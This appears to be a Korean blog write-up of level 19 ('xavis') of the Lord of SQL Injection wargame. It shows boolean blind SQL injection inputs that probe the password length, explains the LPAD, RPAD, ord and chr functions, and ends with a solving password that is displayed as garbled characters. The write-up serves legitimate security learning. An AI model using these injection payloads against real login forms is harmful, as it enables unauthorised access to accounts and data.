Notice
Recent Posts
Recent Comments
일 | 월 | 화 | 수 | 목 | 금 | 토 |
---|---|---|---|---|---|---|
1 | 2 | |||||
3 | 4 | 5 | 6 | 7 | 8 | 9 |
10 | 11 | 12 | 13 | 14 | 15 | 16 |
17 | 18 | 19 | 20 | 21 | 22 | 23 |
24 | 25 | 26 | 27 | 28 | 29 | 30 |
Tags
- CTF-d
- base64
- MFT
- elasticsearch
- foremost
- SQL Injection
- vulnhub
- Volatility
- igoat
- diva
- ctf
- Reflected XSS
- 2018
- InsecureBank
- kibana
- lord of sql injection
- Strings
- Suninatas
- frida
- XSS
- beebox
- 파이썬
- Openstack
- logstash
- 안드로이드
- ESXi
- 인시큐어뱅크
- otter
- NTFS
- Docker
Archives
- Today
- Total
Information Security
[LOS] 19. xavis 본문
?pw=' or length(pw)<50#을 입력 시 Hello admin 문자열을 확인할 수 있다.
?pw=' or length(pw)<41# 입력 시 메시지가 보이지 않았다.
?pw=' or length(pw)<40# 입력 시 Hello admin 메시지를 확인할 수 있어 길이가 40이라는 것을 알 수 있다.
LPAD 함수
LPAD ("값", "총 문자 길이", "채움 문자")문자")
SELECT LPAD('3', 4, '0')AS TEST_LPAD FROM DUAL; => 출력 결과 : 0003
RPAD 함수
RPAD("값", "총 문자 길이", "채움 문자")문자")
SELECT RPAD('3', 4, '0')AS TEST_RPAD FROM DUAL; => 출력 결과 : 3000
ord 함수
특정한 한 문자를 아스키코드 값으로 변환해 주는 함수
chr 함수
아스키 코드 값을 문자로 변환해 주는 함수
?pw=¸ùÅ°ÆÐÄ¡¤» 입력 시 해결되는 것을 알 수 있다.
'WarGame > Lord of SQL Injection' 카테고리의 다른 글
[LOS] 21. iron golem (0) | 2020.08.11 |
---|---|
[LOS] 20. dragon (0) | 2020.08.10 |
[LOS] 18. nightmare (0) | 2020.08.10 |
[LOS] 17. succubus (0) | 2020.08.08 |
[LOS] 16. zombie assassin (0) | 2020.08.08 |